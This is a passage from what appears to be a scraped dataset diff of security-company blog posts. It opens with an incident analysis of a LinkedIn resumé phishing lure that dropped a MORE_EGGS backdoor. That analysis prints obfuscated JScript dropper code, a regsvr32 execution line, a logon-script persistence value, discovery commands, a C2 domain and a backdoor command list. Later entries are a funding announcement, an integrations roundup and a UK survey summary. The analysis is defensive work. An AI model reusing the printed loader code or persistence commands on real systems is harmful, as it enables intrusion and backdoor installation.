lgnsyjcm9801.close(); lgnsyjcm963 = 1; } catch (lgnsyjcm265) { return 0; } return lgnsyjcm963; } function lgnsyjcm400() { try { lgnsyjcm0147.lgnsyjcm786; return true; } catch (lgnsyjcm27) { if (typeof WScript === \"object\") { We then see an attempt at some cryptographic function based on the presence of return Math.floor(Math.random() * 65536 . Open-source intelligence suggests this function is generating a pseudo-random number either used for C2 traffic encryption or as a GUID to uniquely identify the machine for eventual extortion or ransomware reasons. There\u2019s also evidence of an intended registry-read event: function lgnsyjcm206() { var lgnsyjcm681; var lgnsyjcm4718; try { lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656(\"EdT:2)?+6**kP>Yj\", lgnsyjcm8, lgnsyjcm4)); lgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656(\"rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I>(,I5,dv&KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE\", lgnsyjcm8, lgnsyjcm4)); if (!lgnsyjcm4718) { return false; } This can be deobfuscated further, but the next event we see on the host is the decoy document being created and executed using wmi: Script content: IWshShell3.Environment(\"PROCESS\"); IWshEnvironment.Item(\"APPDATA\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"\u2568\u2567\u03b1\u00ed\u2592\u00df\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft6222.doc\"); The user is now presented with a Word document, and nothing appears unusual. Thanks to AMSI content, we can see the 6222.doc file was executed and an ocx file is created. Script Content: IWshShell3.Environment(\"PROCESS\"); IWshEnvironment.Item(\"APPDATA\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"\u2568\u2567\u03b1\u00ed\u2592\u00df\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft6222.doc\"); _Stream.Close(); IWshShell3.RegRead(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp PathsWinword.exe\"); ISWbemServicesEx.Get(\"Win32_Process\"); ISWbemObjectEx._01000001(\"C:Program FilesMicrosoft OfficeRootOffice16WIN\", \"Unsupported parameter type 00000001\", \"Unsupported parameter type 00000001\", \"0\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"MZ\u00c9\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft42981.ocx\") 42981.ocx is now executed by regsrv32.exe, a common tactic used by malicious Word document authors. Script Content: Win32_Process.GetObject(); SetPropValue.CommandLine(\"C:Program FilesMicrosoft OfficeRootOffice16WINWORD.EXE \"C:UsersAppDataRoamingMicrosoft6222.doc\"\"); SetPropValue.CurrentDirectory(\"Unsupported parameter type 00000001\"); SetPropValue.ProcessStartupInformation(\"Unsupported parameter type 00000001\"); Win32_Process.ExecMethod(Create); Win32_Process.GetObject(); SetPropValue.CommandLine(\"regsvr32 /s /n /i:Login \"C:UsersAppDataRoamingMicrosoft42981.ocx\"\"); After executing the .ocx file with regsvr32 we see a registry modification that appears to be a text file in the AppData directory. While we don\u2019t have the contents of the text file, we can assume this is a persistence mechanism. \"Registry Key: S-1-12-1-3569878806-1151277312-3324287152-3804517278Environment Value Name: UserInitMprLogonScript Value Data: cscripT -e:jsCript \"\"%APPDATA%Microsoft46BA2C64FFD9F546.txt\"\" Value Type: RegistryValueEntity\" Regsvr32 also launches the msxsl.exe dropped by the malware to execute the file FC22A0E0F890CC.txt. \"Script Content: Win32_Process.GetObject(); SetPropValue.CommandLine(\"\"C:UsersAppDataRoamingMicrosoftmsxsl.exe FC22A0E0F890CC.txt FC22A0E0F890CC.txt\"\"); After this we see evidence of discovery commands being executed via wmi by the parent process msxsl.exe. Without the contents of the .txt file we can\u2019t really know for sure what\u2019s happening. But based on OSINT, we can speculate that the .txt file is the MORE_EGGS JScript because it behaves like MORE_EGGS. If you\u2019re wondering why we didn\u2019t do further analysis \u2026 good question. We were hindered a bit without file acquisition and were limited to host timelines. MSDFE did a pretty good job of recording. msxsl.exe executed the WMI query 'SELECT Version FROM CIM_Datafile Where Name = 'C:\\windows\\notepad.exe'' msxsl.exe executed the WMI query 'SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True' msxsl.exe executed the WMI query 'SELECT * FROM Win32_Process' typeperf.exe \"SystemProcessor Queue Length\" -si 180 -sc 1 Following some system discovery activity, we see HTTP POSTs to the C2 domain webdirectoryuk[.]com. See Appendix C . The wmi process then executes the cmd.exe command under the victim\u2019s user context to run the nltest command to identify trusted domains and write the output to a text file. This was the final action performed by the malware prior to host containment. cmd /v /c nltest /trusted_domains > \"C:UsersAppDataLocalTemp55337.txt\" 2>&1 Based on open source intelligence research, we suspect 55337.txt is the MORE_EGGS backdoor. This blog explains the capability of this backdoor, which includes command execution \u201cvia cmd.exe /C\u201d among other functionality: Command Description d&exec Download and execute an executable (.exe or .dll). more_eggs Delete the current More_eggs and replace it. Gtfo Uninstall activity. more_onion Execute a script. via_c Run a command using \u201ccmd.exe /C\u201d. Unfortunately, we were unable to acquire any of the files we described. However, given the behaviors performed on the host we were able to tell the story of how a LinkedIn resum\u00e9 phishing document resulted in a MORE_EGGS backdoor. Even without acquiring the file, our analysis of the activity aligns with the financially motivated cybercrime gangs FIN6, Evilnum, or the Cobalt Group. It\u2019s difficult to attribute activity to a specific group, but we saw LinkedIn used in 2021 to deliver MORE_EGGS \u30fc with one key difference. The first iteration of threat groups harnessing LinkedIn for this purpose was an inverse of the victim-attacker relationship. Instead of recruiters expecting resum\u00e9s, the FIN6 group was posing as employers and sending fake job offers to their victims over LinkedIn. Based on their prior use of LinkedIn, it\u2019s quite possible this is the work of FIN6 or a copycat. Either way, credit should be given where due. Financially motivated threat actors aren\u2019t playing around and the victim user this article was based around wasn\u2019t aware that downloading a resum\u00e9s from LinkedIn left a backdoor on their machine. Summary of attack lifecycle: Remediation: Initial remediation focused on stopping the bleeding, containing the host, and reimaging the box to a known good image, ensuring no remnants were left over. We also recommended blocking the C2 domain webdirectoryuk[.]com. Resilience: Even though we detected and reported this incident quickly, the bottom line is that malicious code executed on one of our customer-managed devices on their network. Whenever we can directly point to environment controls to enable defenders or disrupt attackers, we include them in the incident findings report. In this incident we provided the customer with the following resilience actions: Disrupt attackers: Phishing education for users, specifically from trusted sources (LinkedIn). Configure Jscript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad you mitigate common remote code execution techniques. Note that PowerShell files (.ps1) already open by default in Notepad. Enable Defenders: Increase visibility into PowerShell activity by taking advantage of logging capabilities. Module and ScriptBlock logging provide greater visibility into potential PowerShell attacks. Good: Ensure PowerShell 3.0 (at least) is installed on all Windows systems and enable PowerShell Module logging. Better: Ensure PowerShell 5.0 (at least) is installed on all Windows systems and enable PowerShell ScriptBlock logging and transcription logging. Best: Ensure PowerShell 5.0 (at least) is installed on all Windows systems, enable PowerShell ScriptBlock logging and transcription logging; also make sure Microsoft-Windows-PowerShell%4Operational.evtx is at least 1 GB in size on all systems to aid in an investigation. Appendix A Script content: function anonymous() { function lgnsyjcm9469(lgnsyjcm2900) {return lgnsyjcm2900.length;}function lgnsyjcm262(lgnsyjcm6080){return String.fromCharCode(lgnsyjcm6080);}function lgnsyjcm56(lgnsyjcm458) {var lgnsyjcm62 = [];var lgnsyjcm356 = [];var lgnsyjcm144 = \"\";var lgnsyjcm1495;var lgnsyjcm020;var lgnsyjcm4110 = 0;lgnsyjcm62[0x80] = 0x00C7;lgnsyjcm62[0x81] = 0x00FC;lgnsyjcm62[0x82] = 0x00E9;lgnsyjcm62[0x83] = 0x00E2;lgnsyjcm62[0x84] = 0x00E4;lgnsyjcm62[0x85] = 0x00E0;lgnsyjcm62[0x86] = 0x00E5;lgnsyjcm62[0x87] = 0x00E7;lgnsyjcm62[0x88] = 0x00EA;lgnsyjcm62[0x89] = 0x00EB;lgnsyjcm62[0x8A] = 0x00E8;lgnsyjcm62[0x8B] = 0x00EF;lgnsyjcm62[0x8C] = 0x00EE;lgnsyjcm62[0x8D] = 0x00EC;lgnsyjcm62[0x8E] = 0x00C4;lgnsyjcm62[0x8F] = 0x00C5;lgnsyjcm62[0x90] = 0x00C9;lgnsyjcm62[0x91] = 0x00E6;lgnsyjcm62[0x92] = 0x00C6;lgnsyjcm62[0x93] = 0x00F4;lgnsyjcm62[0x94] = 0x00F6;lgnsyjcm62[0x95] = 0x00F2;lgnsyjcm62[0x96] = 0x00FB;lgnsyjcm62[0x97] = 0x00F9;lgnsyjcm62[0x98] = 0x00FF;lgnsyjcm62[0x99] = 0x00D6;lgnsyjcm62[0x9A] = 0x00DC;lgnsyjcm62[0x9B] = 0x00A2;lgnsyjcm62[0x9C] = 0x00A3;lgnsyjcm62[0x9D] = 0x00A5;lgnsyjcm62[0x9E] = 0x20A7;lgnsyjcm62[0x9F] = 0x0192;lgnsyjcm62[0xA0] = 0x00E1;lgnsyjcm62[0xA1] = 0x00ED;lgnsyjcm62[0xA2] = 0x00F3;lgnsyjcm62[0xA3] = 0x00FA;lgnsyjcm62[0xA4] = 0x00F1;lgnsyjcm62[0xA5] = 0x00D1;lgnsyjcm62[0xA6] = 0x00AA;lgnsyjcm62[0xA7] = 0x00BA;lgnsyjcm62[0xA8] = 0x00BF;lgnsyjcm62[0xA9] = 0x2310;lgnsyjcm62[0xAA] = 0x00AC;lgnsyjcm62[0xAB] = 0x00BD;lgnsyjcm62[0xAC] = 0x00BC;lgnsyjcm62[0xAD] = 0x00A1;lgnsyjcm62[0xAE] = 0x00AB;lgnsyjcm62[0xAF] = 0x00BB;lgnsyjcm62[0xB0] = 0x2591;lgnsyjcm62[0xB1] = 0x2592;lgnsyjcm62[0xB2] = 0x2593;lgnsyjcm62[0xB3] = 0x2502;lgnsyjcm62[0xB4] = 0x2524;lgnsyjcm62[0xB5] = 0x2561;lgnsyjcm62[0xB6] = 0x2562;lgnsyjcm62[0xB7] = 0x2556;lgnsyjcm62[0xB8] = 0x2555;lgnsyjcm62[0xB9] = 0x2563;lgnsyjcm62[0xBA] = 0x2551;lgnsyjcm62[0xBB] = 0x2557;lgnsyjcm62[0xBC] = 0x255D;lgnsyjcm62[0xBD] = 0x255C;lgnsyjcm62[0xBE] = 0x255B;lgnsyjcm62[0xBF] = 0x2510;lgnsyjcm62[0xC0] = 0x2514;lgnsyjcm62[0xC1] = 0x2534;lgnsyjcm62[0xC2] = 0x252C;lgnsyjcm62[0xC3] = 0x251C;lgnsyjcm62[0xC4] = 0x2500;lgnsyjcm62[0xC5] = 0x253C;lgnsyjcm62[0xC6] = 0x255E;lgnsyjcm62[0xC7] = 0x255F;lgnsyjcm62[0xC8] = 0x255A;lgnsyjcm62[0xC9] = 0x2554;lgnsyjcm62[0xCA] = 0x2569;lgnsyjcm62[0xCB] = 0x2566;lgnsyjcm62[0xCC] = 0x2560;lgnsyjcm62[0xCD] = 0x2550;lgnsyjcm62[0xCE] = 0x256C;lgnsyjcm62[0xCF] = 0x2567;lgnsyjcm62[0xD0] = 0x2568;lgnsyjcm62[0xD1] = 0x2564;lgnsyjcm62[0xD2] = 0x2565;lgnsyjcm62[0xD3] = 0x2559;lgnsyjcm62[0xD4] = 0x2558;lgnsyjcm62[0xD5] = 0x2552;lgnsyjcm62[0xD6] = 0x2553;lgnsyjcm62[0xD7] = 0x256B;lgnsyjcm62[0xD8] = 0x256A;lgnsyjcm62[0xD9] = 0x2518;lgnsyjcm62[0xDA] = 0x250C;lgnsyjcm62[0xDB] = 0x2588;lgnsyjcm62[0xDC] = 0x2584;lgnsyjcm62[0xDD] = 0x258C;lgnsyjcm62[0xDE] = 0x2590;lgnsyjcm62[0xDF] = 0x2580;lgnsyjcm62[0xE0] = 0x03B1;lgnsyjcm62[0xE1] = 0x00DF;lgnsyjcm62[0xE2] = 0x0393;lgnsyjcm62[0xE3] = 0x03C0;lgnsyjcm62[0xE4] = 0x03A3;lgnsyjcm62[0xE5] = 0x03C3;lgnsyjcm62[0xE6] = 0x00B5;lgnsyjcm62[0xE7] = 0x03C4;lgnsyjcm62[0xE8] = 0x03A6;lgnsyjcm62[0xE9] = 0x0398;lgnsyjcm62[0xEA] = 0x03A9;lgnsyjcm62[0xEB] = 0x03B4;lgnsyjcm62[0xEC] = 0x221E;lgnsyjcm62[0xED] = 0x03C6;lgnsyjcm62[0xEE] = 0x03B5;lgnsyjcm62[0xEF] = 0x2229;lgnsyjcm62[0xF0] = 0x2261;lgnsyjcm62[0xF1] = 0x00B1;lgnsyjcm62[0xF2] = 0x2265;lgnsyjcm62[0xF3] = 0x2264;lgnsyjcm62[0xF4] = 0x2320;lgnsyjcm62[0xF5] = 0x2321;lgnsyjcm62[0xF6] = 0x00F7;lgnsyjcm62[0xF7] = 0x2248;lgnsyjcm62[0xF8] = 0x00B0;lgnsyjcm62[0xF9] = 0x2219;lgnsyjcm62[0xFA] = 0x00B7;lgnsyjcm62[0xFB] = 0x221A;lgnsyjcm62[0xFC] = 0x207F;lgnsyjcm62[0xFD] = 0x00B2;lgnsyjcm62[0xFE] = 0x25A0;lgnsyjcm62[0xFF] = 0x00A0;do {lgnsyjcm1495 = lgnsyjcm458[lgnsyjcm4110];if (lgnsyjcm1495 < 128) {lgnsyjcm020 = lgnsyjcm1495;}else {lgnsyjcm020 = lgnsyjcm62[lgnsyjcm1495];}lgnsyjcm356.push(lgnsyjcm262(lgnsyjcm020));lgnsyjcm4110 += 1;} while (lgnsyjcm4110 < lgnsyjcm9469(lgnsyjcm458));lgnsyjcm144 = lgnsyjcm356.join(\"\");return lgnsyjcm144;}function lgnsyjcm15(lgnsyjcm287) {return new ActiveXObject(lgnsyjcm287);}function lgnsyjcm7522() {return Math.floor(Math.random() * 65536);}function lgnsyjcm4677(lgnsyjcm387, lgnsyjcm4315, lgnsyjcm7403, lgnsyjcm1632, lgnsyjcm4299){var lgnsyjcm963;try {var lgnsyjcm5310 = lgnsyjcm598(lgnsyjcm387);var lgnsyjcm081 = lgnsyjcm894(lgnsyjcm5310, lgnsyjcm7403, lgnsyjcm1632);lgnsyjcm5310 = 0;if (lgnsyjcm4299 === 1 && lgnsyjcm081[0] !== 0x4D && lgnsyjcm081[1] !== 0x5a){return 0;}var lgnsyjcm9801 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm28, lgnsyjcm8, lgnsyjcm4));lgnsyjcm9801.open();lgnsyjcm9801.position = 0;lgnsyjcm9801.type = 2;lgnsyjcm9801.charset = 437;lgnsyjcm9801.writeText(lgnsyjcm56(lgnsyjcm081));lgnsyjcm081 = 0;lgnsyjcm9801.saveToFile(lgnsyjcm4315);lgnsyjcm9801.close();lgnsyjcm963 = 1;} catch (lgnsyjcm265) {return 0;}return lgnsyjcm963;}function lgnsyjcm400() {try {lgnsyjcm0147.lgnsyjcm786;return true;} catch(lgnsyjcm27) {if (typeof WScript === 'object') {return true;}lgnsyjcm481();}}function lgnsyjcm206(){var lgnsyjcm681;var lgnsyjcm4718;try{lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656('EdT:2)?+6**kP>Yj', lgnsyjcm8, lgnsyjcm4));lgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656('rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I>(,I5,dv&KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE', lgnsyjcm8, lgnsyjcm4));if (!lgnsyjcm4718) {return false;}return lgnsyjcm4718;} catch(lgnsyjcm0598){return false;}}function lgnsyjcm481(){var lgnsyjcm9032 = \"\\;var lgnsyjcm4797;var lgnsyjcm867;var lgnsyjcm337 = \"\"\"\";var lgnsyjcm118 = '\"\"';var lgnsyjcm449 = \"\"\"\";try {lgnsyjcm4797 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm737" +} \ No newline at end of file diff --git a/more-good-news-in-still-unusual-times.json b/more-good-news-in-still-unusual-times.json new file mode 100644 index 0000000000000000000000000000000000000000..79d43907f53ef9b99efd368ce6a9383251334472 --- /dev/null +++ b/more-good-news-in-still-unusual-times.json @@ -0,0 +1,6 @@ +{ + "title": "More good news in still unusual times", + "url": "https://expel.com/blog/more-good-news-in-still-unusual-times/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG More good news in still unusual times Expel insider \u00b7 4 MIN READ \u00b7 DAVE MERKEL, YANEK KORFF AND JUSTIN BAJKO \u00b7 NOV 18, 2021 \u00b7 TAGS: Cloud security / Company news / MDR Here comes the unicorn swag. Expel is abuzz with the recent announcement that we\u2019ve officially reached \u201cunicorn\u201d status. Even though many of us are still working from our homes during this infernal lingering global pandemic \u2013 the excitement is palpable. Our $140.3 Million Series E financing is an incredible gust of wind in our sails. CapitalG , Alphabet\u2019s independent growth fund, and Paladin Capital Group co-led another round of financing with support from our existing investors : Greycroft, Index Ventures and Scale Venture Partners. We\u2019re also excited to welcome new investors participating in this round: Cisco Investments and March Capital. There\u2019s a long list of things we\u2019re grateful for that we\u2019ll be sharing with our family and friends this Thanksgiving. We were named a Leader in The Forrester Wave\u2122: Managed Detection And Response, Q1 2021 and Leader in IDC MarketScape for U.S. Managed Detection and Response Services Market 2021 Vendor Assessment (doc #US48129921, August 2021). We won Exabeam\u2019s MSSP/MDR U.S. and North America partner of the year award and have been listed on a number of FORTUNE\u2019s best places to work lists. We were listed on the AWS Marketplace where people can buy our 24\u00d77 MDR service for their AWS (and hybrid) environments, and continued forming strong partnerships with our community . And we did it all while maintaining quarterly NPS scores of over 80 despite our rapid growth. Oh, and we\u2019re now a tech startup that reached a $1 billion valuation in just five years. That\u2019s really freakin\u2019 cool. That puts us among 32 other cybersecurity unicorns \u2013 nine of which have also reached this milestone in 2021. That\u2019s 32 out of more than 3,500 cybersecurity companies. And that\u2019s just in the U.S. It\u2019s humbling. We\u2019re honored to be listed among these companies, and to know that our investors continue to place their bets on us \u2013 understanding that we\u2019ll use these resources to continue building something that sets us apart from other MDR vendors and defines the future of the modern security operations center (SOC). Since inception, we\u2019ve wanted to create space for people to do what they love about security. And we\u2019re doing it! Our customers love it. Our investors see that, and they\u2019re doubling down. Could we have done this alone? No way. The fact that we did that during some truly unusual and painful times can\u2019t be overlooked. We\u2019re eternally grateful to our team, customers and partners. Locking arms to climb the mountain That\u2019s been our motto for the past year and a half. We end every all-hands meeting with the reminder that we\u2019ll make it \u2013 we just need to lock arms as we climb this mountain. Because we get it done together. It\u2019s not about ninjas and rockstars; it\u2019s about the strength of our team. We set out to make security as accessible as the internet, and this past year put all of us to the test. And the Expel team didn\u2019t just rise to the occasion \u2013 we were named among the leaders in the industry. Recognition from Forrester and IDC is an honor and further validation that even during times of chaos, we can and will deliver on our mission to help people get back to doing what they love. We can\u2019t say it enough: we couldn\u2019t have done this without our customers and partners. Together, we\u2019ve built something that goes beyond world-class security. And we\u2019ve been blown away by the enthusiastic outreach we\u2019ve received from other security leaders and can\u2019t wait to build upon and expand those partnerships. Our collective curiosity allowed us to look around corners, create community outside Expel and build something that\u2019s changing the industry. You might have heard (and read ) about how we focus on optimizing the human moment. So, what does that really mean? We\u2019re not just talking about using tech to handle what can be automated so our crew can shine in the moments that need a human mind. We\u2019re making space for Expletives to grow and show up to work authentically. We\u2019re giving our customers time back in their day so they can focus on what makes them look forward to coming into work. We\u2019re discovering what\u2019s next and creating solutions with our partners. In 2020, we all found ourselves at the foot of a tall and scary-looking mountain. But this group locked arms and we climbed up. It confirmed what us founders already knew \u2013 with this crew, we can climb any mountain. Forging ahead As our customers navigate still uncertain times, they can be certain that we\u2019ll have their back. This new investment will help us continue to keep our customers safe while also pioneering a path forward. We\u2019re growing quickly in both size and in the myriad ways in which we help keep our customers safe. Our industry has a lot to consider as we look to what\u2019s next: ransomware attacks are on the rise, phishing tactics are evolving and orgs of all sizes are waking up in the cloud. And those are just a few examples. These aren\u2019t easy challenges to tackle. But we have the utmost faith in our team and the outstanding collaboration we experience with our existing customers. The creative minds and technical skills that Expletives bring to the table will guarantee that we\u2019ll make very good use of this money. We\u2019ll continue to expand our cloud security offerings, grow our sales operations, explore going international, add to our rapidly growing list of security partners and throw open the gates that have locked out so many people from entering the cybersecurity field. What this all means is that we\u2019ll keep building seriously cool $#*! . We\u2019ll keep bringing in new ideas and perspectives to the team through our Diversity, Equity and Inclusion (DEI) recruitment initiatives \u2013 or Equity, Inclusion and Diversity (EID) as we call it here at Expel \u2013 that will keep us at the front of the pack. And thanks to our incredible crew, we\u2019ll continue to dramatically improve the efficacy of detection and response. Expletives will continue problem solving with our customers and partners \u2013 keeping a close eye on the trends that impact our customers and inspire us to build new capabilities. And we\u2019ll keep sharing the insights we gather on a regular basis with the community through blogs , attack vectors reports and by creating platforms for our crew to share their experiences and knowledge with the security community. We\u2019re proud of the ground we\u2019ve covered this past year. And we\u2019re even more excited about where we\u2019re going next. Want to find out more about what we\u2019re doing next? We\u2019d love to chat ." +} \ No newline at end of file diff --git a/new-integrations-to-manage-overall-business-risk.json b/new-integrations-to-manage-overall-business-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..caf0ba30582258bf810868ea8cd50bc9227fc522 --- /dev/null +++ b/new-integrations-to-manage-overall-business-risk.json @@ -0,0 +1,6 @@ +{ + "title": "new integrations to manage overall business risk", + "url": "https://expel.com/blog/integrations-roundup-new-integrations-to-manage-overall-business-risk/", + "date": "Mar 29, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Integrations roundup: new integrations to manage overall business risk Engineering \u00b7 3 MIN READ \u00b7 ALAN NEWMAN \u00b7 MAR 29, 2023 \u00b7 TAGS: Cloud security / Company news / Tech tools At Expel, we take a bring-your-own (BYO) tech approach to security operations. Instead of requiring customers to buy and implement specific tech, we integrate with the security tools they already have to maximize their existing investment. This also gives our customers more control over the security tech they use now and in the future. Our integration portfolio has more than 100 integrations spanning cloud, Kubernetes, SaaS, SIEM, network, endpoint technologies, and more. We\u2019re continuously adding new integrations to the portfolio to ensure we\u2019re integrating with the right tech to manage risk across your business. But risk isn\u2019t limited to security alone. If the last few years have taught us anything, it\u2019s that risk is a business-wide challenge that spans all people, processes, and technology within the organization. That\u2019s why our strategy with our security operations platform, Expel Workbench\u2122, is to integrate with all the applications that present a layer of risk to your business, not just security tech. That\u2019s why we\u2019re excited to share that we\u2019ve built new integrations with popular business applications, including Slack, Salesforce, Workday, and GitLab, so customers can manage overall business risk all within the Expel Workbench. Security tech is still a fundamental component of the risk equation, which is why we\u2019ve also released new integrations with Microsoft Intune and ExtraHop. Slack Slack is a corporate instant messaging system that supports messaging, voice calls, media, and files through private chats, shared groups, or even as part of communities. As hybrid work is the norm for most organizations, the amount of highly sensitive data being communicated through Slack has substantially increased, making it a new vector of risk. With our new Slack integration, the Expel Workbench has detections for user logins from suspicious countries, IPs, and from TOR domains in addition to monitoring risky configuration changes in the platform. We also support DUET detections for configuration changes such as when a user is granted an owner role. Salesforce Salesforce is a cloud-based customer relationship management platform. Sales, marketing, and success teams use Salesforce heavily to store prospect and customers\u2019 personally identifiable information (PII). That PII is critical for effective go-to-market outreach, but also presents a risk to both the business and the customer if exposed. Our new Salesforce integration, working with Salesforce Shield and Real-Time Event Monitoring, identifies suspicious authentication requests including both the user and IP address behind the authentication event, credential stuffing and session hijacking attacks, and anomalous API events. It creates a timeline of the event, and enriches with context like IP address, country, domain name, user agent string and more, and then scopes for related alerts. The gathered security signals and audit events are also used to provide additional context that helps our analysts and robots investigate alerts from other security technologies. Workday Workday is a cloud-based enterprise resource planning (ERP) technology used for managing human resource functions, financial analysis, and analytical solutions, among other processes. The human resource (HR) team typically uses Workday to manage employee information, like compensation, benefits, social security information, and more. While Workday may make the HR\u2019s team managing employee information easier, it\u2019s now become a database of sensitive employee information. Our new Workday integration monitors suspicious IP addresses, domain names, and user agent strings. GitLab GitLab is a DevOps platform that helps in software development. It provides the ability to collaborate, secure, and release software using easy-to-manage tools. It\u2019s one of the most popular platforms of its kind, and developers are increasingly building, releasing, and deploying applications that can expose the business to risk without the right security controls in place. Our new integration monitors GitLab audit events to identify suspicious authentication requests, including IP address, country, domain name, user agent strings, as well as monitoring risky configuration changes done in the platform. Microsoft Intune Microsoft Intune (formerly Windows Intune) is a cloud-based endpoint management solution. It manages user access and simplifies app and device management across many devices, including mobile devices, desktop computers, and virtual endpoints. Expel Workbench now integrates with Microsoft Intune to quickly gather investigative data for triage and investigation of alerts to deliver high-quality and expedient containment and remediation actions \u2013 as well as monitoring risky configuration changes done in the platform. ExtraHop ExtraHop Reveal(x) provides AI-based network intelligence that stops advanced threats across cloud, hybrid, and distributed environments. The core of ExtraHop technology is a passive network appliance that uses a network tap or port mirroring to receive network traffic. We now integrate with ExtraHop Reveal(x) and monitor the platform\u2019s security alerts. Integrated platform to manage overall business risk Cybersecurity isn\u2019t an isolated discipline. Organizations are constantly adopting new technologies to support their missions, and this means that the threat landscape has grown in size and sophistication. Risk spans the business, so we\u2019re excited to provide even more opportunities to manage this business risk, all from the Expel Workbench platform. To learn more about these integrations, please visit our integrations guide ." +} \ No newline at end of file diff --git a/new-uk-cybersecurity-report-top-5-findings.json b/new-uk-cybersecurity-report-top-5-findings.json new file mode 100644 index 0000000000000000000000000000000000000000..db59c6ad4dc8d0db605420d43ba9f0e03ceac377 --- /dev/null +++ b/new-uk-cybersecurity-report-top-5-findings.json @@ -0,0 +1,6 @@ +{ + "title": "New UK cybersecurity report: top 5 findings", + "url": "https://expel.com/blog/new-uk-cybersecurity-report-top-5-findings/", + "date": "Apr 19, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG New UK cybersecurity report: top 5 findings Security operations \u00b7 3 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 APR 19, 2023 \u00b7 TAGS: MDR We recently surveyed 500 IT decision-makers (ITDMs)\u2014including IT and security execs, directors, and managers; owner/proprietors; partners; board chairs and members; chief executives; and managing directors\u2014to get a better sense for the state of cybersecurity in the UK. The report, The UK cybersecurity landscape: challenges and opportunities , was released today. Some of the findings align with our expectations, while others surprised us. And while at first glance, the findings may paint a scary picture, there\u2019s lots of opportunities for security leadership and teams to improve their strategies and capabilities. Here\u2019s a preview of our top findings. 1: ITDMs rate cybersecurity third on their list of concerns, but those in IT-specific roles see it as the biggest problem. It\u2019s rough going in the UK right now, as businesses deal with (among other things) the cost-of-living crisis, the looming prospect of a recession, and ever-changing customer expectations. Despite these worries, half of all respondents highlighted security (50%) as a top challenge for 2023, behind energy prices (61%) and the economic climate (54%). However\u2014perhaps owing to their proximity to the daily activity of the security operations centre (SOC)\u2014IT departments see it as the most daunting challenge they face. Respondents also noted worries over sustainability, soaring customer expectations, and a global talent shortage. 2: A significant amount of the allotted security budget is going unused. ITDMs surveyed report a median annual security budget of \u00a3200,000, which (predictably) varies by company size. Surprisingly, though, the survey found that, on average, 26.7% of allocated security budgets went unspent. This equals an average of \u00a353,400 in available cybersecurity budget was unused in 2022. Twenty-one percent of respondents reported spending 50% or less of their security budgets. 3: U.K. organisations face tremendous security-related fatigue. Security teams have their hands full. In addition to fighting the bad guys (investigating and researching alerts, responding to cybersecurity incidents, threat hunting, etc.), they\u2019re also asked to conduct cyber hygiene training for employees, implement and integrate new security tools, and, by the way, train themselves so they can stay abreast of the latest hacker best practices (or perhaps we\u2019d call these worst practices). To complicate every step in the journey, they spend a huge chunk of time on low-priority alerts and false positives. This, in turn, leads to the much-discussed phenomenon of alert fatigue, which occurs when a constant barrage of alerts hits the SOC\u2019s queue and the team either can\u2019t deal with the volume or becomes de-sensitised to them. The result? Analysts either take longer to respond or ignore the alerts completely. Adding insult to injury is a talent shortage of about \u2013 3.4 million security professionals , a number roughly equal to the combined population of the cities of Birmingham, Glasgow, Liverpool, Bristol, and Manchester, and representing an increase of more than 26% over 2021, per (ISC)\u00b2. This results in defenders finding their cybersecurity work frequently infringing on their private lives. Ninety-three percent of respondents say work related to IT management and cybersecurity risk has forced them to cancel, delay, or interrupt personal commitments. Thirty-four percent of the total say this happens all or most of the time, as do 43% of IT team members and 38% of CIOs/CTOs. (Many organisations, especially in the 250-1,000 employee tier, don\u2019t have a dedicated security team, and in these cases, the IT team is responsible for security operations.) What impact can this eventually have? 4: The resulting burnout threatens security and causes staff turnover. A distressing number of those charged with safeguarding the business against cyberattackers experience burnout (61% of all respondents and a whopping 70% of IT and security pros say they or members of their teams are victims). That those in the trenches\u2014security and IT teams\u2014report higher numbers than everyone else suggests the problem may be worse than company leaders realize. As we know, burnout is unsustainable. In the absence of internal remedies, the risk that workers will exit increases. In this case, respondents believe there\u2019s better than a 50% chance they\u2019ll lose people in the coming year. Of particular interest: these folks report they\u2019re thinking of leaving the \u201ccybersecurity industry,\u201d not just their current company. This should be a very concerning finding for U.K. organisations, as it suggests the already thin talent pool could shrink further. 5: Because of all these challenges, UK organisations tend toward a tactical and reactive approach vs. a forward-looking, strategic one. Thirty-eight percent of respondents indicated mandatory regulation as the most common driver for further security investment. The next two responses will also sound familiar to security leaders: responding to a breach (32%) and improving security for maturing businesses (29%) are the next most common drivers of investment. Fewer organisations seem motivated by customer-driven requirements (25%) and executive input (22%). The overall picture is of an industry operating as largely responsive and tactical vs. proactive and strategic. And in looking at the rest of the findings in our research, it\u2019s no wonder! Cybersecurity is already a hard job\u2013the added challenges we found make it even harder! Given these challenges, it\u2019s very difficult for security leaders to shift their mindset, but organisations get the best outcomes when engaged leadership sees security budget as a business-enabling investment instead of a cost centre and commits to evolving around the user. The full report is, in some places, a confirmation of many ITDM concerns . In others, it\u2019s a bracing splash of cold water. In all cases, it\u2019s insightful and provides useful guidance for those plotting their security strategies for the coming year and beyond. We 